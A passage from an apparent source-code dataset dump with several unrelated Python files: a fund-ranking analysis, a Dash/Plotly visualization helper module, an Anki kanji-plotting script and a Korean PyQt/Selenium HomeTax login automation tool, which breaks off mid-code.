Funds_profile.Data[1][i],Funds_profile.Data[3][i], Fund_category(Funds_profile.Data[4][i]),temp_TS]\n fund=Fund(**dict(zip(names,values)))\n Funds_list.append(fund) ##\n return Funds_list\n\ndef funds_data_load_from_excel(xls_name,evaluation_range_date):\n '私募基金数据载入'\n Funds_list=[]\n evaluation_begin_date=evaluation_range_date[0]\n evaluation_end_date=evaluation_range_date[1]\n xls_name='私募数据.xlsx'\n # xls_name='aPieceOfData.xlsx'\n Funds_profile=pd.read_excel(xls_name,0).set_index('代码')\n data=pd.read_excel(xls_name,1)\n data['日期']+=timedelta(microseconds=5000) # 因为要和wind的利率、市场数据配对 所以要调整时间,以保证完全吻合\n data_group=data.groupby('代码')\n # seq=data_group.__iter__().__next__()[1]\n names=Fund._field\n for code,seq in data_group:\n seq=seq.set_index('日期')\n temp_Data=seq['净值']\n dates=temp_Data.index\n index_filter=np.logical_and(dates>evaluation_begin_date,dates bool:\n return self.frameFreq == 0.0\n\n def execute(self):\n self.render()\n\n def render(self):\n pass\n\n def createBaseLayout(self):\n \"\"\"Creates the base layout\"\"\"\n\n # Create banner\n banner = html.Div(\n className=\"app-banner row\",\n children=[\n html.H2(className=\"h2-title\", children=self.name),\n html.H2(className=\"h2-title-mobile\", children=self.name),\n ],\n )\n\n # Add parameter header\n self.addParameter(createLabel('parameter-heading', 'Parameters:'))\n\n # If framerate > 0, create the play, stop, and restart buttons and Timestep label\n if not self.isStatic():\n # Add Play/Restart/Step Buttons\n banner.children.append(\n html.Div(\n className='div-play-buttons',\n id='dynamic-button',\n children=[\n html.Button(\"Play\", id='play-stop-button', n_clicks=0),\n html.Button('Restart', id='restart-button', n_clicks=0),\n html.Button('Step', id='step-button', n_clicks=0),\n dcc.Interval(\n id='interval-component',\n interval=self.frameFreq,\n n_intervals=0\n )\n ]\n )\n )\n\n # Add Timestep label\n self.parameters.append(createLabel('timestep-label', 'Timestep: 0'))\n\n # Apply Play/Stop Callback\n self.app.callback(\n dash.dependencies.Output('play-stop-button', 'children'),\n [dash.dependencies.Input('play-stop-button', 'n_clicks')]\n )(self.play_button_callback)\n # Apply executeSystems() on interval callback and Step button callback\n self.app.callback(\n 
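funds_rank above follows a three-step recipe: percentile-rank each metric, blend the ranks with weights, then bucket the blended rank into labels with pd.cut. The recipe in isolation, with illustrative column names, weights, bins, and grade labels:

import numpy as np
import pandas as pd

df = pd.DataFrame(
    {"returns": [0.12, 0.30, -0.05, 0.18], "sharp": [1.1, 1.8, 0.2, 1.4]},
    index=["fund_a", "fund_b", "fund_c", "fund_d"],
)

# Percentile rank per metric (higher metric value -> higher rank).
pct = df.rank() / len(df)
# Weighted blend, re-ranked into a 0-100 score.
score = (pct * np.array([0.6, 0.4])).sum(axis=1).rank() / len(df) * 100
# Bucket the score into labelled grades.
grade = pd.cut(score, bins=[0, 25, 50, 75, 100],
               labels=["poor", "fair", "good", "excellent"])
print(pd.concat([score, grade], axis=1, keys=["score", "grade"]))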
dash.dependencies.Output('timestep-label', 'children'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks')]\n )(self.execute_system_on_play_callback)\n\n self.app.layout = html.Div(\n children=[\n # Error Message\n html.Div(id=\"error-message\"),\n # Top Banner\n banner,\n # Body of the App\n html.Div(\n className=\"row app-body\",\n children=[\n # User Controls\n html.Div(\n className=\"four columns card\",\n children=html.Div(\n className=\"bg-white user-control\",\n children=self.parameters)\n ),\n # Graph\n html.Div(\n className=\"eight columns card-left\",\n children=self.displays,\n style={'margin-left': 0}\n ),\n dcc.Store(id=\"error\", storage_type=\"memory\"),\n ],\n ),\n ]\n )\n\n def addDisplay(self, content, add_break=True):\n self.displays.append(content)\n\n if add_break:\n self.displays.append(html.Br())\n\n def addParameter(self, content):\n self.parameters.append(content)\n\n# #################################### Class Callbacks ###########################################\n def play_button_callback(self, n_clicks):\n if n_clicks % 2 == 0:\n self.running = False\n return 'Play'\n else:\n self.running = True\n return 'Stop'\n\n def execute_system_on_play_callback(self, n_intervals, n_clicks):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if context == 'step-button':\n if not self.running:\n self.model.systems.executeSystems()\n elif self.running:\n self.model.systems.executeSystems()\n\n return \"Timestep: {}\".format(self.model.systems.timestep)\n\n# ############################## Graph and Parameter Functionality ##############################\n\n\ndef createScatterPlot(title, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Scatter plot Figure. This function supports multiple traces supplied to the 'data' parameter\n Data should be supplied in the following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n traces = []\n for data_packet in data:\n scatter = go.Scatter(x=data_packet[0], y=data_packet[1])\n traces.append(scatter)\n if len(data_packet) > 2:\n scatter.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createScatterGLPlot(title, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Scatter plot Figure that will be rendered using WebGL.\n This function supports multiple traces supplied to the 'data' parameter Data should be supplied in the\n following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n\n traces = []\n for data_packet in data:\n scatter = go.Scattergl(x=data_packet[0], y=data_packet[1])\n traces.append(scatter)\n if len(data_packet) > 2:\n scatter.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createBarGraph(title: str, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Bar Graph Figure. 
This function supports multiple traces supplied to the 'data' parameter\n Data should be supplied in the following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n traces = []\n for data_packet in data:\n bar = go.Bar(x=data_packet[0], y=data_packet[1])\n traces.append(bar)\n if len(data_packet) > 2:\n bar.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createHeatMap(title: str, data: [[float]], heatmap_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a HeatMap Figure object using Plotly graph objects. The data object determines the dimensions of the\n heatmap. The len(data) will be the height. The len(data[i]) will be the width of the heatmap. The Heatmap is\n constructed in a bottom-up and left-to-right manner.\n\n Discrete X and Y categories can be specified, this is done by supplying xData and yData with the X and Y category\n name respectively. The len(xData) must be equal to the width of your Heatmap, while len(yData) must be equal to the\n height of your Heatmap.\n\n A custom color scale can be supplied, ensure that it follows the correct format and that the threshold values are\n normalized and that the color scales are in rgb like so 'rgb(r_val, g_val, b_val)'\"\"\"\n\n return go.Figure(data=go.Heatmap(\n z=data,\n **heatmap_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createHeatMapGL(title: str, data: [[float]], heatmap_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a HeatMap Figure object using Plotly graph objects that will be rendered by WebGL.\n The data object determines the dimensions of the heatmap. The len(data) will be the height.\n The len(data[i]) will be the width of the heatmap.\n The Heatmap is constructed in a bottom-up and left-to-right manner.\n\n Discrete X and Y categories can be specified, this is done by supplying xData and yData with the X and Y category\n name respectively. The len(xData) must be equal to the width of your Heatmap, while len(yData) must be equal to the\n height of your Heatmap.\n\n A custom color scale can be supplied, ensure that it follows the correct format and that the threshold values are\n normalized and that the color scales are in rgb like so 'rgb(r_val, g_val, b_val)'\"\"\"\n\n return go.Figure(data=go.Heatmapgl(\n z=data,\n **heatmap_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createContourMap(title: str, data: [[float]], contour_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a Contour Figure object using Plotly graph objects. The data object determines the dimensions of the\n Contour plot. The len(data) will be the height. The len(data[i]) will be the width of the contour plot.\n The contour plot is constructed in a bottom-up and left-to-right manner.\n\n The contour plot can be customized using the contour_kwargs dict. The dict will be supplied to the contour plot\n graph object when it is created. See the plotly api for a list of customizable properties. 
This can be similarly be\n applied to layout_kwargs which can change the layout of contour plot.\"\"\"\n\n return go.Figure(data=go.Contour(\n z=data,\n **contour_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createTable(title: str, headers: [str], cells: [[]], header_kwargs: dict = {}, cell_kwargs: dict = {},\n layout_kwargs: dict = {}):\n \"\"\"Creates a Table figure using Plotly graph objects. Table headers and cells need to be supplied separately.\n The data format for the headers and cells are as follows:\n Headers: [hdr1, hdr2,...,hdrN]\n Cells: [column1_data, column2_data,..., columnN_data].\n\n The Table headers and cells are customized separately using the header_kwargs and cell_kwargs parameters. The\n layout of the Table can also be customized using the layout_kwargs.\"\"\"\n\n return go.Figure(data=go.Table(\n header=dict(values=headers, **header_kwargs),\n cells=dict(values=cells, **cell_kwargs)\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createPieChart(title: str, labels: [str], values: [float], pie_kwargs: dict = {}, layout_kwargs: dict = {}):\n \"\"\" Creates a Pie Chart Figure using Plotly graph objects. Chart labels and values need to be supplied separately.\n The data format for the labels and values are as follows:\n Labels: [lbl1, lbl2,..., lblN]\n Values: [val1, val2,..., valN]\n\n The Pie chart can be customized using the pie_kwargs parameter. The layout of the Pie chart can be customized using\n the layout_kwargs parameter.\"\"\"\n\n return go.Figure(data=go.Pie(labels=labels, values=values, **pie_kwargs),\n layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createGraph(graphID: str, figure: go.Figure, classname: str = 'bg-white'):\n return html.Div(\n className=classname,\n children=[\n dcc.Graph(id=graphID, figure=figure)\n ],\n style={'height': figure.layout.height}\n )\n\n\ndef createLiveGraph(graphID: str, figure: go.Figure, vs: VisualInterface, callback, classname: str = 'bg-white'):\n graph = createGraph(graphID, figure, classname)\n\n def update_live_graph_callback(n_intervals, n_clicks, figure):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if (context == 'step-button' and not vs.running) or vs.running:\n return callback(figure)\n else:\n return figure\n\n # Add Callback\n vs.app.callback(\n dash.dependencies.Output(graphID, 'figure'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks'),\n dash.dependencies.Input(graphID, 'figure')]\n )(update_live_graph_callback)\n\n return graph\n\n\ndef createLabel(label_id, content):\n return html.Div(className=\"padding-top-bot\", children=[html.H6(content, id=label_id)])\n\n\ndef createLiveLabel(label_id, initial_content, vs: VisualInterface, callback):\n label = createLabel(label_id, initial_content)\n\n def update_live_label_callback(n_intervals, n_clicks, children):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if (context == 'step-button' and not vs.running) or vs.running:\n return callback(children)\n else:\n return children\n\n # Add Callback\n vs.app.callback(\n dash.dependencies.Output(label_id, 'children'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks'),\n dash.dependencies.Input(label_id, 'children')]\n )(update_live_label_callback)\n\n return label\n\n\ndef createSlider(slider_id: str, slider_name: str, vs: VisualInterface, set_val, min_val: float = 0.0,\n max_val: float 
= 1.0, step: float = 0.01):\n \"\"\"This function will add a slider to the parameter window of the visual interface. It will also automatically add\n a callback function that will supply your custom function 'set_val' with the value of the slider\"\"\"\n\n # Add html\n slider = html.Div(\n className=\"padding-top-bot\",\n children=[\n html.H6('{}: [{}]'.format(slider_name, max_val), id=slider_id + '-title'),\n dcc.Slider(\n id=slider_id,\n min=min_val,\n max=max_val,\n value=max_val,\n step=step\n )\n ]\n )\n\n # Add callback\n\n def set_slider_val(value):\n set_val(value)\n return '{}: [{}]'.format(slider_name, value)\n\n vs.app.callback(dash.dependencies.Output(slider_id + '-title', 'children'),\n [dash.dependencies.Input(slider_id, 'value')])(set_slider_val)\n\n return slider\n\n\ndef addRect(fig: go.Figure, x, y, width=1, height=1, **shape_kwargs):\n \"\"\"Adds a rectangle to Figure 'fig'. x & y refer to the coordinates of the bottom left corner of the rectangle.\"\"\"\n x1 = x + width\n y1 = y + height\n fig.add_shape(\n x0=x,\n y0=y,\n x1=x1,\n y1=y1,\n type='rect',\n **shape_kwargs\n )\n\n\ndef addCircle(fig: go.Figure, x, y, radius=0.5, **shape_kwargs):\n \"\"\"Adds a circle to Figure 'fig'. x & y are the coordinates of the center of the circle\"\"\"\n x0 = x - radius\n x1 = x + radius\n y0 = y - radius\n y1 = y + radius\n\n fig.add_shape(\n x0=x0,\n x1=x1,\n y0=y0,\n y1=y1,\n type='circle',\n **shape_kwargs\n )\n\n\ndef createTabs(labels: [str], tabs: []):\n return html.Div([\n dcc.Tabs(\n [\n dcc.Tab(label=labels[x], children=tabs[x]) for x in range(len(labels))\n ]\n )])\n","sub_path":"ECAgent/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":17287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621211518","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport sqlite3\nimport sys\nimport unicodedata\n\ndef select_deck():\n decks = []\n for row in c.execute('SELECT decks FROM col'):\n deks = json.loads(row[0])\n for key in deks:\n d_id = deks[key]['id']\n d_name = deks[key]['name']\n decks.append((d_id, d_name))\n\n print('Which deck would you like to plot?\\n')\n\n for i in range(len(decks)):\n print(' ['+str(i)+'] '+decks[i][1])\n inp = int(input('\\n'))\n return decks[inp]\n\nconn = sqlite3.connect('collection.anki2')\nc = conn.cursor()\nwith_raw = False\nraw_rel = False\n\nif(sys.platform == 'win32'):\n kanjiplot_command = 'kanjiplot '\n write_flags = 'wb'\nelse:\n kanjiplot_command = './kanjiplot.sh '\n write_flags = 'w'\n\nif(len(sys.argv) < 2 or sys.argv[1] == 'with_raw_abs' or sys.argv[1] == 'with_raw_rel'):\n if len(sys.argv) == 2:\n if(sys.argv[1] == 'with_raw_abs'):\n with_raw = True\n if(sys.argv[1] == 'with_raw_rel'):\n with_raw = True\n raw_rel = True\n deck_tpl = select_deck()\n deck_id = deck_tpl[0]\nelse:\n if(sys.argv[1] == 'find'):\n deck_tpl = select_deck()\n print('\\ndeck \"'+deck_tpl[1]+'\" has ID '+str(deck_tpl[0])+'\\n\\nrun the following command for automated plotting:\\n'+kanjiplot_command+str(deck_tpl[0])+'\\n\\n\\n')\n sys.exit(0)\n deck_id = sys.argv[1]\n\ndates = []\nkanji = []\ndata_points = dict()\ntotal = 0\n\ncards_data_points = dict()\ncards_total = 0\n\nkanji_data_points = dict()\n\nfor row in c.execute('SELECT id, flds FROM notes WHERE id IN (SELECT nid FROM cards WHERE did IS ' + str(deck_id) + ') ORDER BY id'):\n timestamp = row[0]\n date = datetime.datetime.fromtimestamp(timestamp/1000).strftime(\"%y%m%d\")\n data = row[1]\n 
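All of the create* helpers above accept data as [[x, y, trace_kwargs], ...] and fold each packet into a Plotly trace, applying the optional third element as per-trace styling. What that amounts to without the wrappers, assuming plotly is installed:

import plotly.graph_objects as go

data = [
    [[0, 1, 2], [0, 1, 4], {"name": "squares", "mode": "lines"}],
    [[0, 1, 2], [0, 1, 8], {"name": "cubes", "mode": "markers"}],
]

traces = []
for packet in data:
    trace = go.Scatter(x=packet[0], y=packet[1])
    if len(packet) > 2:
        trace.update(packet[2])   # optional per-trace styling
    traces.append(trace)

fig = go.Figure(data=traces, layout=go.Layout(title="Demo"))
fig.show()  # opens in a browser or notebook renderer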
cards_total += 1\n cards_data_points[date] = cards_total\n for i in range(0, len(data)):\n char = data[i]\n try:\n if(unicodedata.name(char).find('CJK UNIFIED IDEOGRAPH') >= 0):\n if(not char in kanji):\n total += 1\n kanji.append(char)\n if(not date in dates):\n dates.append(date)\n data_points[date] = total\n if with_raw:\n if not date in kanji_data_points:\n kanji_data_points[date] = ''\n if not raw_rel:\n kanji_data_points[date] = ''\n if raw_rel:\n if(kanji_data_points[date].find(char) == -1):\n kanji_data_points[date] += char\n else:\n for i in range(0, len(kanji)):\n kanji_data_points[date] += kanji[i]\n except ValueError:\n pass\n\nf = open('kanji.dat', write_flags)\nif with_raw:\n fr = open('kanji_raw.dat', write_flags)\nfor d in dates:\n if with_raw:\n if(sys.platform == 'win32'):\n fr.write(str(d) + ' ' + kanji_data_points[d].encode('utf8') + '\\n')\n else:\n fr.write(str(d) + ' ' + str(kanji_data_points[d]) + '\\n')\n f.write(str(d) + ' ' + str(data_points[d]) + ' ' + str(cards_data_points[d]) + '\\n')\n","sub_path":"kanjiplot.py","file_name":"kanjiplot.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"67029735","text":"import time\nimport os\nimport sys\nimport zipfile\nimport json\nimport PyQt5\n# from PyQt5.Qt import QApplication\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget, QWidget, QPushButton, QRadioButton, QLabel, QLineEdit, QAction, qApp \nfrom PyQt5.QtWidgets import QMessageBox, QTabWidget, QGridLayout, QGroupBox, QHBoxLayout, QVBoxLayout, QFormLayout\nfrom PyQt5.QtGui import QIcon, QRegExpValidator, QDoubleValidator, QIntValidator\nfrom PyQt5.QtCore import pyqtSlot, Qt, QRegExp\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport data\nimport Util\nfrom Util import *\n\n'''배포판 실행파일(exe) 만들기 https://wikidocs.net/21952 https://winterj.me/pyinstaller/\npyinstaller 디코딩에러 수정 https://stackoverflow.com/questions/47692960/error-when-using-pyinstaller-unicodedecodeerror-utf-8-codec-cant-decode-byt\nI found an answer on another forum. I change the line number 427 in the Python\\Lib\\site-packages\\Pyinstaller\\compat.py file\n'''\n# 처음시작시 경로설정\nbase_path = \"C:\\\\\"\nmain_dir = \"ATM\"\nmain_path = os.path.join(base_path, main_dir) # APP 저장경로\nst1_app_dir = ['loginAPP', 'data']\nst1_app_path = os.path.join(main_path, st1_app_dir[0]) # 첫번째앱 저장경로\ndriver_path = os.path.join(st1_app_path, \"driver\") # 크롬드라이버 저장경로\ndata_path = os.path.join(st1_app_path, \"data\") # json 파일 등 저장경로\njson_fn = \"data.json\" # \nfull_json_fn = os.path.join(data_path, json_fn) # json 파일 full 경로\n\ndef set_path_make_json():\n \"\"\" 앱 경로설정\n \"\"\"\n try:\n if not os.path.isdir(main_path):\n Util.make_sub_dirs(base_path, main_dir)\n except:\n pass\n\n # 앱 경로에 하위 경로 설정하고 json 파일 생성후 생성된 json 파일에서 변수로 활용할 파이썬 객체 (nts_dict) 생성\n try:\n if not os.path.isdir(st1_app_path):\n # 1. 하위 APP 디렉토리 없으면 만들고\n Util.make_sub_dirs(main_path, *st1_app_dir)\n Util.make_sub_dirs(st1_app_path, \"driver\") \n\n # 1.1 크롬드라이버 설치(exe 파일과 zip 파일을 같은 경로에...)\n try:\n with zipfile.ZipFile(os.path.join(os.getcwd(), \"chromedriver.zip\")) as zf:\n zf.extractall(driver_path)\n except:\n pass\n\n # 2. 
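The scan above classifies a character as kanji when its Unicode name contains 'CJK UNIFIED IDEOGRAPH', catching ValueError for code points that have no name. That test in isolation:

import unicodedata

def is_kanji(char):
    """True for CJK unified ideographs, the same test as the scan above."""
    try:
        return "CJK UNIFIED IDEOGRAPH" in unicodedata.name(char)
    except ValueError:  # some code points (e.g. many controls) have no name
        return False

print([c for c in "日本語abc123" if is_kanji(c)])  # ['日', '本', '語']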
딕셔너리를 json 파일로 만들어 저장\n nts_dict = data.get_nts_dict()\n nts_dict['secret']['크롬경로'] = driver_path \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n # json_data = json.dumps(_dict_data, ensure_ascii=False, indent=4)\n\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn)\n\n elif os.path.isdir(st1_app_path):\n if not os.path.isfile(full_json_fn):\n # 2. 딕셔너리를 json 파일로 만들어 저장\n nts_dict = data.get_nts_dict() \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n # json_data = json.dumps(_dict_data, ensure_ascii=False, indent=4)\n\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn) \n\n elif os.path.isfile(full_json_fn):\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn) \n except:\n pass\n finally:\n return nts_dict\n\nnts_dict = set_path_make_json() \n\n# 브라우저 높이에 따른 크롬 실행환경 변경 flag\nflag_window_height = True\n\n# 셀레니움 Xpath element 반환함수\ndef get_element(driver, id):\n try:\n if \"세무법인이노택스테헤\" not in id:\n wait = WebDriverWait(driver, 10)\n element = wait.until(EC.presence_of_element_located((By.XPATH, f\"//*[@id=\\'{id}\\']\")))\n elif \"세무법인이노택스테헤\" in id:\n wait = WebDriverWait(driver, 10)\n element = wait.until(EC.presence_of_element_located((By.XPATH, f\"//*[@title=\\'{id}\\']\")))\n return element\n\n except Exception as e:\n err_class_name = e.__class__.__name__\n msg = f\"selenium id < {id} >에서 예외 < {err_class_name} >가 발생 하였습니다.\"\n errmsg = Errpop().critical_pop(msg)\n\n\nclass Ui_nts_ligin(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent)\n self.bs_id = nts_dict['secret']['부서아이디'] \n self.delay_time = float(nts_dict['secret']['딜레이타임']) \n \n self.initUI()\n\n def initUI(self):\n\n grid = QGridLayout()\n grid.addWidget(self.firstGroup(), 0, 0)\n grid.addWidget(self.secondGroup(), 0, 1)\n\n self.setLayout(grid)\n \n def firstGroup(self):\n groupbox = QGroupBox('CTA ID 로그인')\n self.radio1 = QRadioButton('W15960')\n self.radio2 = QRadioButton('P27687')\n self.radio1.setChecked(True)\n\n # QRadioButton 예제 https://wikidocs.net/5237\n self.radio1.clicked.connect(self.radioButtonClicked)\n self.radio2.clicked.connect(self.radioButtonClicked)\n\n btn1 = QPushButton('홈택스 로그인')\n btn1.setToolTip('HomeTax Login')\n btn1.clicked.connect(self.btn1_click)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.radio1)\n vbox.addWidget(self.radio2)\n vbox.addWidget(btn1)\n groupbox.setLayout(vbox)\n\n return groupbox\n\n def secondGroup(self):\n # QLineEdit 총괄 : https://www.tutorialspoint.com/pyqt/pyqt_qlineedit_widget\n groupbox = QGroupBox('부서 ID 및 딜레이 변경 ')\n\n le1 = QLineEdit()\n le2 = QLineEdit()\n le1.setPlaceholderText(nts_dict['secret']['부서아이디'])\n le2.setPlaceholderText(str(nts_dict['secret']['딜레이타임']))\n \n # 입력제한 http://bitly.kr/wmonM2\n reg_ex = QRegExp(\"[0-9]+.?[0-9]{,2}\")\n input_validator = QRegExpValidator(reg_ex, le2)\n # double_validator = QDoubleValidator(-999.0, 999.0, 2) ### http://bitly.kr/wmonM2\n le2.setValidator(input_validator) # double_validator) \n le2.setMaxLength(3) \n\n le1.textChanged[str].connect(self.le1Changed)\n le2.textChanged[str].connect(self.le2Changed)\n\n btn2 = QPushButton('변경사항저장', self)\n btn2.setToolTip('저장하기')\n btn2.clicked.connect(self.btn2_click)\n\n flo = QFormLayout()\n 
flo.addRow(\"부서아이디\", le1)\n flo.addRow(\"딜레이타임\", le2)\n flo.addRow(btn2)\n groupbox.setLayout(flo)\n\n return groupbox\n\n def radioButtonClicked(self):\n \n if self.radio1.isChecked():\n if self.radio1.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio1.text()\n \n elif self.radio2.isChecked():\n if self.radio2.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio2.text()\n else:\n pass\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n \n def btn1_click(self):\n if self.radio1.isChecked():\n if self.radio1.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio1.text()\n \n elif self.radio2.isChecked():\n if self.radio2.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio2.text()\n else:\n pass\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n\n login = Nts_Login()\n login.path2()\n\n def le1Changed(self, text):\n self.bs_id = text\n \n def le2Changed(self, text):\n self.delay_time = text\n \n\n def btn2_click(self):\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n nts_dict['secret']['부서아이디'] = self.bs_id\n nts_dict['secret']['딜레이타임'] = str(self.delay_time)\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n\nclass Ui_nts_task(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent)\n \n self.initUi()\n\n def initUi(self):\n\n grid = QGridLayout()\n btn1 = QPushButton()\n grid.addWidget(btn1)\n btn1.clicked.connect(self.btn1_click)\n\n self.setLayout(grid) \n\n def btn1_click(self):\n print(\"btn1 clicked\") \n\nclass Ui_web_task(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent) \n label = QLabel('개발중...') \n layout = QVBoxLayout()\n layout.addWidget(label) \n\n self.setLayout(layout) \n\nclass Main(QMainWindow): # (QWidget): #\n def __init__(self):\n \"\"\" QMainWindow 에서는 QHBoxLayout, QVBoxLayout 같은 layout 사용못함.\n QWidget, QDialog 와 달리 QMainWindow 는 자체적으로 layout 가지고 있다. 
central widget 을 반드시 필요로함.\n https://freeprog.tistory.com/326\"\"\"\n super().__init__()\n \n # self.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.WindowTitleHint) # | Qt.FramelessWindowHint) 항상 위에\n # 우하단 위젯\n rect = QDesktopWidget().availableGeometry() # 작업표시줄 제외한 화면크기 반환\n max_x = rect.width()\n max_y = rect.height()\n # 브라우저 높이에 따른 크롬 실행환경 변경 flag\n global flag_window_height\n if max_y <= 900:\n flag_window_height = False\n\n width, height = 350 , 220\n # width, height = 350 , 250\n left = max_x - width \n top = max_y - height \n\n self.setGeometry(left, top, width, height)\n\n # 탭 위젯\n tab1 = Ui_nts_ligin(self)\n tab2 = Ui_nts_task(self)\n tab3 = Ui_web_task(self)\n\n tabs = QTabWidget()\n tabs.addTab(tab1, '홈택스 로그인')\n tabs.addTab(tab2, '홈택스 작업')\n tabs.addTab(tab3, '웹 작업')\n\n self.setCentralWidget(tabs) \n self.setWindowTitle('ATM(자동화)')\n self.setWindowFlags(Qt.FramelessWindowHint) # windowtitle 제외\n #>>> 메뉴바 https://wikidocs.net/21866\n exitAction = QAction(QIcon('exit.png'), '종료', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(qApp.quit)\n\n # self.statusBar()\n\n menubar = self.menuBar()\n menubar.setNativeMenuBar(False)\n fileMenu = menubar.addMenu('&메뉴')\n fileMenu.addAction(exitAction)\n #<<< 메뉴바\n self.statusBar().showMessage('Ready')\n\n self.show()\n\n# class Errpop(QWidget):\n# def __init__(self):\n# super().__init__() \n# rect = QDesktopWidget().availableGeometry() # 작업표시줄 제외한 화면크기 반환\n# max_x = rect.width()\n# max_y = rect.height()\n\n# width, height = 350 , 250\n# left = max_x - width \n# top = max_y - height\n# self.setGeometry(left, top, width, height) \n\n# def critical_pop(self, msg): \n# msg = msg\n# QMessageBox.critical(self, '에러 메세지', msg, QMessageBox.Ok)\n\n# class Get_driver:\n# def __init__(self, driver_path, driver_name):\n# self.driver_path = driver_path\n# self.driver_name = driver_name\n# self.full_driver_name = os.path.join(self.driver_path, self.driver_name)\n\n# def set_driver(self):\n \n# if \"chrome\" in self.full_driver_name:\n# try:\n# chrome_options = webdriver.ChromeOptions()\n\n# driver = webdriver.Chrome(self.full_driver_name, options=chrome_options)\n# return driver\n# except:\n# msg = \"드라이버 경로( {0} )에 {1}이(가) 없습니다 !!!\".format(self.driver_path, self.driver_name)\n# errmsg = Errpop().critical_pop(msg)\n \n# elif True :\n# pass \n\nclass Nts_Login:\n def __init__(self):\n driver_path = nts_dict['secret']['크롬경로'] \n driver_name = nts_dict['secret']['크롬드라이버'] \n chrome_driver = Get_driver(driver_path, driver_name)\n self.driver = chrome_driver.set_driver()\n self.driver.get('https://www.hometax.go.kr/')\n # 모니터 작은 경우\n global flag_window_height\n if flag_window_height == False:\n self.driver.maximize_window()\n self.delay_time = float(nts_dict['secret']['딜레이타임'])\n time.sleep(self.delay_time)\n\n # 홈택스 별도페이지\n def path2(self):\n try:\n _ST1BOX = self.driver.find_element_by_id(\"ST1BOX\") # 종합소득세 신고\n _ST1BOX.click()\n 